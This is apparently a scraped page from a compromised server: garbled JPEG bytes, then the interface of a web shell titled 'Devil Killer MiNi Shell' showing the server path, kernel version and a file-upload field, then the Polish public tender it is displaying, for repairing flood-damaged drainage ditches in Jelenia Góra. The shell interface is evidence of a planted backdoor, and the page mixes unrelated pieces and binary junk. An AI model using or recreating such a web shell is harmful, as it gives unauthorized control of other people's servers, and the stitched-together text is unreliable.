JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250620/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250620/0028674301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Naprawa i udrożnienie rowów melioracyjnych zniszczonych w wyniku powodzi w mieście Jelenia Góra </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO JELENIA GÓRA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821523</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Ratuszowy 58</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@jeleniagora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jeleniagora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Naprawa i udrożnienie rowów melioracyjnych zniszczonych w wyniku powodzi w mieście Jelenia Góra </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-03160871-3576-4f74-9d77-488cf92a218f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00286743</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00040822/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.22 Bieżące utrzymanie urządzeń melioracji wodnych – z przeznaczeniem na usuwanie skutków powodzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/jeleniagora <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/jeleniagora</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w pkt 15 i 24 Tomu I SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.U.UE.L.119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>	administratorem Pani/Pana danych osobowych jest Gmina – Miasto Jelenia Góra z siedzibą: Plac Ratuszowy 58, 58-500 Jelenia Góra reprezentowana przez Prezydenta Miasta Jeleniej Góry;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z ochroną danych osobowych i realizacją praw z tym związanych w następujący sposób: pisemnie na adres – Urząd Miasta Jelenia Góra, Inspektor Ochrony Danych Osobowych, <br/>Plac Ratuszowy 58 58-500 Jelenia Góra; osobiście w w/w siedzibie Urzędu Miasta Jelenia Góra; telefonicznie pod nr tel. 75 -75 49- 860 lub poprzez pocztę elektroniczną na adres: iodo_um@jeleniagora.pl<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z realizacją zapisów Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2024 r., poz. 1320 z późn. zm.);<br/>	Pani/Pana dane osobowe mogą być udostępnione uprawnionym służbom i organom administracji publicznej, tylko jeśli przepisy ustaw to nakazują lub na to pozwalają;<br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat; <br/>	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego w rozumieniu określonym w przepisach RODO;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	prawo sprzeciwu, wobec przetwarzania danych osobowych na podstawie art. 21 RODO, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>Zakres każdego z w/w praw oraz sytuacje, w których można z nich skorzystać wynikają z przepisów z zakresu ochrony danych osobowych (RODO i przepisów krajowych). To, z którego uprawnienia będzie można skorzystać będzie przedmiotem rozstrzygnięcia przez Administratora w ramach rozpatrywania ewentualnego wniosku o skorzystanie, z któregoś z w/w praw.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZ.271.33.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane obejmujące swoim zakresem naprawę i udrożnienie (ręczne i/lub mechaniczne odmulenie) rowów melioracyjnych zniszczonych w wyniku powodzi w mieście Jelenia Góra wraz z wywozem/rozplantowaniem urobku z odmulenia, a także uzupełnianie ubytków skarp i dna rowu.<br/>Rowy objęte niniejszym zamówieniem zostały uszkodzone w wyniku powodzi we wrześniu 2024 r.<br/>Zamówienie realizowane jest w ramach Specjalnego Programu Udzielania Pomocy Finansowej w Usuwaniu Skutków Powodzi dla Obszarów Objętych Stanem Klęski Żywiołowej w 2024 r. uchwalonego Uchwałą Zarządu Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej we Wrocławiu nr 100/2025 z dnia 10.03.2025 r.<br/><br/>Część I - Naprawa i udrożnienie rowów melioracyjnych zlokalizowanych przy ul. Lubańskiej w Jeleniej Górze<br/>Przedmiotem zamówienia jest udrożnienie poprzez odmulenie rowów wraz z uzupełnieniem i odtworzeniem ubezpieczeń dna i skarp rowów płytami betonowymi zlokalizowanych przy ulicy Lubańskiej w Jeleniej Górze: rów R-H28, rów R-H1.<br/><br/>1. Rów R-H28:<br/>1) Rów melioracyjny R-H28 zlokalizowany jest w rejonie ul. Lubańskiej (działka nr 71 AM 1 obręb Cieplice I przy giełdzie).<br/>2) Łączna długość rowu wynosi 980 m, odcinek objęty zamówieniem obejmuje 325 m.<br/>3) Charakterystyka i opis uszkodzeń:<br/>Rów R-H28 odprowadza wody od strony zachodniej w kierunku ul. Lubańskiej, gdzie tuż przed drogą przyjmuje wody z rowu R-H1 (również objętym dokumentacją). Rów jest nieubezpieczony, posiada przekrój trapezowy koryta, i średnią szerokość dna 0,5 m. W wyniku napływu wód jakie miało miejsce podczas powodzi, a co za tym idzie podtopień przyległych terenów, doszło do akumulacji namułu w dnie rowu. Wobec czego istnieje konieczność przywrócenia przekroju właściwego koryta rowu poprzez odmulenie, w celu zachowania jego funkcji.<br/>4) Zakres niezbędnych do wykonania prac w celu udrożnienia rowu obejmuje m.in:<br/>a) odmulenie dna rowu – ok. 325 m; szerokość dna ok. 0,6 m, głębokość ok. 1,5 m; (warstwą 30 cm - 200 m oraz warstwą 40 cm – ok. 125 m),<br/>b) wywóz urobku – ok. 30 m3,<br/>c) rozplantowanie urobku – ok. 60 m3.<br/><br/>2. Rów R-H1:<br/>1) Rów melioracyjny R-H1 zlokalizowany jest w rejonie ul. Lubańskiej (działki nr 68 AM 1 i nr 19/2 AM 3 obręb Cieplice I).<br/>2) Łączna długość rowu wynosi 2703 m, odcinek objęty zamówieniem obejmuje 1 100 m.<br/>3) Charakterystyka i opis uszkodzeń:<br/>Rów R-H1 odprowadza wody od strony zachodniej w kierunku ul. Lubańskiej, gdzie tuż przed drogą uchodzi do rowu R-H28 (również objętym dokumentacją). Łączna długość rowu wynosi 2703 m, odcinek objęty zamówieniem obejmuje 1 100 m. Rów posiada przekrój trapezowy, odcinkowo ubezpieczonej betonowymi płytami PA-II o średniej szerokość dna 0,8 m. W wyniku napływu wód jakie miało miejsce podczas powodzi, doszło do akumulacji namułu w dnie rowu, oraz lokalnych uszkodzeń ubezpieczeń skarpowych i dennych w postaci płyt PA-II. Wobec czego istnieje konieczność przywrócenia przekroju właściwego koryta rowu poprzez odmulenie i naprawę ubezpieczeń, w celu zachowania jego funkcji.<br/><br/>4) Zakres niezbędnych do wykonania prac w celu udrożnienia rowu obejmuje m.in:<br/>a) oczyszczenie przepustu rurowego o śr. 60 cm, 1/3 zamulenia,<br/>b) uzupełnienie ubezpieczeń z płyt PA-II w dnie i na skarpie rowu – ok. 5,4 m2<br/>c) odmulenie dna rowu – ok. 1 100 m, o głębokości rowu do 1,5 m, szerokość dna ok. 0,5 m (w tym: warstwą 30 cm – dł. ok. 700 m, oraz warstwą 40 cm – dł. ok. 400 m),<br/>d) rozplantowanie części urobku z odmulenia wzdłuż górnej krawędzi rowu,<br/>e) przetransportowanie części urobku z odmulenia w miejsce składowania lub zagospodarowania,<br/>f) odtworzenie ubezpieczeń z płyt PA-II – ok. 5 m3.<br/><br/>Opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Warunków Zamówienia, w tym w załącznikach do opisu przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111240-2 - Roboty w zakresie odwadniania gruntu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria:<br/>1) Cena - 60%<br/>2) Termin realizacji przedmiotu zamówienia - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane obejmujące swoim zakresem naprawę i udrożnienie (ręczne i/lub mechaniczne odmulenie) rowów melioracyjnych zniszczonych w wyniku powodzi w mieście Jelenia Góra wraz z wywozem/rozplantowaniem urobku z odmulenia, a także uzupełnianie ubytków skarp i dna rowu.<br/>Rowy objęte niniejszym zamówieniem zostały uszkodzone w wyniku powodzi we wrześniu 2024 r.<br/>Zamówienie realizowane jest w ramach Specjalnego Programu Udzielania Pomocy Finansowej w Usuwaniu Skutków Powodzi dla Obszarów Objętych Stanem Klęski Żywiołowej w 2024 r. uchwalonego Uchwałą Zarządu Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej we Wrocławiu nr 100/2025 z dnia 10.03.2025 r.<br/><br/>Część II - Udrożnienie rowów melioracyjnych zlokalizowanych przy ul. Miłosza i ul. Lubańskiej w Jeleniej Górze<br/><br/>Przedmiotem zamówienia jest udrożnienie poprzez odmulenie dna rowu melioracyjnego zlokalizowanego przy ul. Miłosza (Rów - R-B6) oraz przy ul. Lubańskiej w Jeleniej Górze.<br/><br/>1. Rów - R-B6 przy ul. Miłosza:<br/>1) Rów melioracyjny R-B6 zlokalizowany jest w rejonie ul. Miłosza (działka nr 1/2 AM 5 i działka nr 24 AM 4 obręb Cieplice IV).<br/>2) Łączna długość rowu wynosi 380 m, zamówieniem został objęty cały odcinek rowu.<br/>3) Charakterystyka i opis uszkodzeń:<br/>Rów melioracyjny R-B6 odprowadza wody od strony zachodniej, sąsiednio idący wzdłuż strony odpowietrznej północno-zachodniego obwałowania suchego zbiornika przeciwpowodziowego Cieplice i skręcającego w kierunku północnym wzdłuż zabudowań mieszkalnych przy ul. Cz. Miłosza. Rów posiada nieubezpieczone koryto trapezowe i średnią szerokość dna 0,6 m. W wyniku napływu wód jakie miało miejsce podczas powodzi, doszło do akumulacji namułu w dnie rowu. Wobec czego istnieje konieczność przywrócenia przekroju właściwego koryta rowu poprzez odmulenie, w celu zachowania jego funkcji i przywróceniu przepustowości, co z uwagi na bliskie sąsiedztwo zabudowy mieszkalnej, oraz zbiornika przeciwpowodziowego Cieplice stanowi priorytet. Sprawne odprowadzanie wody z powierzchni terenu, oraz obniżanie wysokich poziomów wód gruntowych w rejonie końca obwałowania zbiornika zapobiegnie namakaniu skarpy i powstawaniu niekorzystnych warunków wodno – gruntowych <br/>w strategicznym dla bezpieczeństwa mieszkańców obiekcie hydrotechnicznym.<br/>4) Zakres niezbędnych do wykonania prac w celu udrożnienia rowu obejmuje m.in:<br/>a) odmulenie dna rowu warstwą 30 cm – dł. 380 m, szerokość dna ok. 0,6 m, głębokość: ok. 1,5 m,<br/>b) przetransportowanie urobku z odmulenia w miejsce składowania lub zagospodarowania – <br/>ok. 27,40 m3,<br/>c) rozplantowanie ręczne wzdłuż górnej krawędzi rowu – ok. 41,0 m3,<br/>d) rozplantowanie spycharką urobku na deponii – ok. 27,40 m3.<br/><br/>2. Rów melioracyjny przy ul. Lubańskiej:<br/>1) Rów melioracyjny przy ul. Lubańskiej zlokalizowany jest na działce nr 14/3, 14/4 i 19 AM 8 obr. Cieplice II.<br/>2) Łączna długość rowu wynosi 520 m, zamówieniem został objęty cały odcinek rowu.<br/>3) Charakterystyka i opis uszkodzeń:<br/>Rów odprowadza wody od wschodu od ul. Lubańskiej wzdłuż ul. Wojewódzkiej (na południe od Stadionu), w kierunku nasypu kolejowego. Rów jest nieubezpieczony, posiada trapezowe koryto i średnią szerokość dna 0,6 m. W wyniku napływu wód jakie miało miejsce podczas powodzi, a co za tym idzie podtopień przyległych terenów, doszło do akumulacji namułu w dnie rowu. Wobec czego istnieje konieczność przywrócenia przekroju właściwego koryta rowu poprzez odmulenie, w celu zachowania jego funkcji.<br/>4) Zakres niezbędnych do wykonania prac w celu udrożnienia rowu obejmuje m.in:<br/>a) odmulenie dna rowu – 520 m, szerokość dna ok. 0,6 m, głębokość: ok. 1,5 m,<br/>b) skarpowanie skarp i dna rowu – ok. 728 m2,<br/>c) likwidację karcza (pnia) śr. 40 cm z dna rowu z wywozem- 1 szt.,<br/>d) rozplantowanie urobku z rowu wzdłuż górnej krawędzi – ok. 105,6 m3.<br/><br/>Opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Warunków Zamówienia, w tym w załącznikach do opisu przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111240-2 - Roboty w zakresie odwadniania gruntu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria:<br/>1) Cena - 60%<br/>2) Termin realizacji przedmiotu zamówienia - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane obejmujące swoim zakresem naprawę i udrożnienie (ręczne i/lub mechaniczne odmulenie) rowów melioracyjnych zniszczonych w wyniku powodzi w mieście Jelenia Góra wraz z wywozem/rozplantowaniem urobku z odmulenia, a także uzupełnianie ubytków skarp i dna rowu.<br/>Rowy objęte niniejszym zamówieniem zostały uszkodzone w wyniku powodzi we wrześniu 2024 r.<br/>Zamówienie realizowane jest w ramach Specjalnego Programu Udzielania Pomocy Finansowej w Usuwaniu Skutków Powodzi dla Obszarów Objętych Stanem Klęski Żywiołowej w 2024 r. uchwalonego Uchwałą Zarządu Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej we Wrocławiu nr 100/2025 